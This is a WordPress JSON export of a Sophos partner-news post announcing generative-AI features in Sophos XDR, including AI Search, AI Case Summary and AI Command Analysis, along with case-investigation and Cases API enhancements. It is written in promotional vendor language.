{"id":8456,"date":"2024-11-21T09:33:12","date_gmt":"2024-11-21T09:33:12","guid":{"rendered":"https:\/\/partnernews.sophos.com\/it-it\/?p=8456"},"modified":"2024-11-22T09:33:54","modified_gmt":"2024-11-22T09:33:54","slug":"sophos-xdr-new-generative-ai-functionality-and-case-investigation-enhancements","status":"publish","type":"post","link":"https:\/\/partnernews.sophos.com\/it-it\/2024\/11\/products\/sophos-xdr-new-generative-ai-functionality-and-case-investigation-enhancements\/","title":{"rendered":"Sophos XDR: New Generative AI Functionality and Case Investigation Enhancements"},"content":{"rendered":"<p>Defenders need all the help they can get. The Sophos XDR team has been focused on delivering features and functionality that will expand and improve analysts&#8217; efficiency and ability to detect and neutralize threats faster.<\/p>\n<p>The latest enhancements expand the power and capabilities of Sophos XDR with generative AI (genAI) and new case investigation functionality. The genAI features are focused on delivering outcomes, such as accelerated investigations, enabling less experienced analysts to do security operations and neutralize adversaries faster.<\/p>\n<table style=\"border-collapse: collapse; width: 100%; border: none;\">\n<tbody>\n<tr>\n<td style=\"width: 100%;\">genAI capabilities are available as an opt-in for all licensed Sophos XDR customers, ensuring they remain in control. Customers can opt into these features in Sophos Central.<\/p>\n<p><iframe loading=\"lazy\" title=\"YouTube video player\" src=\"https:\/\/www.youtube.com\/embed\/bpOf5PtOKc8?si=qI2uvSRV48ZANo5b\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>AI Search<\/h2>\n<p>AI Search helps security analysts by allowing them to search large volumes of security data using natural language. This makes it easier to conduct investigations without needing advanced technical knowledge like SQL. Powered by OpenAI&#8217;s large language models (LLMs), AI Search translates natural language queries into structured SQL queries that are executed against Sophos&#8217; data lake. Users can ask simple questions (e.g., &#8220;Show me all detections from the last week related to Windows Server&#8221;) and view results in a user-friendly format.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8654 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-search_f5f7f8.png\" alt=\"\" width=\"1600\" height=\"900\" \/><\/p>\n<p>For more details, please refer to the <a href=\"https:\/\/community.sophos.com\/sophos-xdr\/new-ai-features\/b\/announcements\/posts\/ai-search-for-detections\" target=\"_blank\" rel=\"noopener\">AI Search article<\/a> on the Sophos Community.<\/p>\n<p>&nbsp;<\/p>\n<h2>AI Case Summary<\/h2>\n<p>AI Case Summary\u00a0provides an easy-to-understand overview of detections and recommended next steps, helping analysts make smart decisions fast. This feature uses genAI to analyze detections associated with a case to summarize what has happened, the entities involved, and possible next steps for investigation. AI Case Summary also determines which MITRE ATT&amp;CK tactics, techniques and procedures (TTPs) are observed within the case, if any.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8655 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-cases.png\" alt=\"\" width=\"1600\" height=\"900\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2>AI Command Analysis<\/h2>\n<p>AI Command Analysis\u00a0provides insights into attacker behavior by examining potentially malicious commands that create detections. This feature uses genAI to analyze the command line executed in the customer\u2019s environment to explain the intent and describe the possible security impact on your environment. AI Command Analysis will de-obfuscate code, minimizing the complexity, time, and skills needed to assess a detection.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8656 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-command-analysis.png\" alt=\"\" width=\"1600\" height=\"900\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2>Coming Soon: AI Assistant<\/h2>\n<p>The Sophos AI Assistant is a collaborative chat interface designed to elevate security operations with a collaborative, conversational interface. Underpinned by the Sophos Data Lake and a set of robust tools\u2014the AI Assistant streamlines complex investigations using genAI to improve threat response, no matter your level of expertise.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8657 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-ai-assistant.png\" alt=\"\" width=\"1180\" height=\"916\" \/><\/p>\n<p>&nbsp;<\/p>\n<h2>Sophos and AI<\/h2>\n<p>Sophos combines AI and human expertise to stop the broadest range of threats wherever they occur. Security analysts are empowered to make smart decisions fast, and customers can operate confidently, knowing Sophos\u2019 robust, battle-proven AI solutions are on their side.<\/p>\n<p>Since 2017, Sophos has been elevating cybersecurity with AI. Deep learning and genAI capabilities are embedded at every point and delivered through the industry&#8217;s largest, most scalable, open AI platform. Sophos\u2019 AI-powered products and services secure over 600,000 organizations from cyberattacks and breaches.<\/p>\n<p>&nbsp;<\/p>\n<h2>New case investigation enhancements<\/h2>\n<p>When an analyst looks at the specifics of a detection as a part of a case, they now benefit from a refreshed and simplified interface for the pivot menu for \u00a0new quick actions and updated queries. The pivot menu allows an analyst to select key information from a detection, using it as a starting point for deeper investigation and immediate action. Here\u2019s what\u2019s new:<\/p>\n<ul>\n<li>Run actions: We have added the ability to isolate and unisolate devices direct from the pivot menu, allowing users to remediate quickly without losing context.<\/li>\n<li>Run Live Discover and Search Data Lake: The queries list has been updated to feature the most frequently used queries.<\/li>\n<li>Copy Device Name: Easily copy the device name to your clipboard.<\/li>\n<li>Detections with device: Go straight to the detections page to see all detections associated with the device. The default time range is the last 24 hours.<\/li>\n<li>Device Details: Navigate directly to the device details page for more in-depth information.<\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-8658 size-full\" src=\"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2024\/11\/sophos-xdr-device-details.png\" alt=\"\" width=\"915\" height=\"415\" \/><\/p>\n<p>The Cases public API has been enhanced, allowing customers and partners to create, update, and delete cases using their preferred tools. With this new functionality, customers can easily modify key fields such as case status, severity, and case summary, enabling more effective prioritization and faster triage times. These improvements are designed to give customers more flexibility in their workflows and help address issues more efficiently. Please refer to the <a href=\"https:\/\/developer.sophos.com\/cases\" target=\"_blank\" rel=\"noopener\">Cases API Guide<\/a> for more details.<\/p>\n<p>&nbsp;<\/p>\n<h2>Recognized by industry experts and customers<\/h2>\n<p>Sophos XDR continues to garner high praise from customers and industry experts for superior detection, investigation, and response capabilities.<\/p>\n<p>Recent proof points include:<\/p>\n<ul>\n<li>Sophos XDR was named a Leader across five different segments in the Fall 2024 Reports. Read the report <a href=\"https:\/\/news.sophos.com\/en-us\/2024\/09\/30\/the-power-of-the-platform-sophos-is-uniquely-recognized-in-the-g2-fall-2024-reports\/\" target=\"_blank\" rel=\"noopener\">here<\/a><\/li>\n<li>A Leader in the 2024 Gartner\u00ae\ufe0f Magic Quadrant\u2122\ufe0f for Endpoint Protection Platforms for the 15th consecutive time. Read the news article <a href=\"https:\/\/partnernews.sophos.com\/en-us\/2024\/09\/resources\/sophos-named-a-leader-in-the-2024-gartner-magic-quadrant-for-endpoint-protection-platforms\/\" target=\"_blank\" rel=\"noopener\">here<\/a><\/li>\n<li>Over 43,000 customers using Sophos XDR today<\/li>\n<li>\u2018Why Sophos\u2019 page on <a href=\"https:\/\/www.sophos.com\/why\" target=\"_blank\" rel=\"noopener\">sophos.com<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Resources<\/h2>\n<ul>\n<li><a href=\"https:\/\/community.sophos.com\/sophos-xdr\/new-ai-features\" target=\"_blank\" rel=\"noopener\">Sophos Community: New AI Features<\/a><\/li>\n<li><a href=\"https:\/\/www.youtube.com\/watch?v=bpOf5PtOKc8\" target=\"_blank\" rel=\"noopener\">Outcome-focused AI Video<\/a><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Our latest features include new generative AI functionality and case investigation enhancements in Sophos XDR.<\/p>\n","protected":false},"author":11,"featured_media":3000007079,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"advanced_seo_description":"","jetpack_seo_html_title":"","jetpack_seo_noindex":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[70],"tags":[32,107,104],"coauthors":[42],"class_list":["post-8456","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-products","tag-intercept-x","tag-sophos-endpoint","tag-sophos-xdr"],"jetpack_featured_media_url":"https:\/\/partnernews.sophos.com\/en-us\/wp-content\/uploads\/sites\/3\/2023\/11\/featured-image-sophos-xdr.png","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts\/8456","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/users\/11"}],"replies":[{"embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/comments?post=8456"}],"version-history":[{"count":1,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts\/8456\/revisions"}],"predecessor-version":[{"id":8465,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/posts\/8456\/revisions\/8465"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/media?parent=8456"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/categories?post=8456"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/tags?post=8456"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/partnernews.sophos.com\/it-it\/wp-json\/wp\/v2\/coauthors?post=8456"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}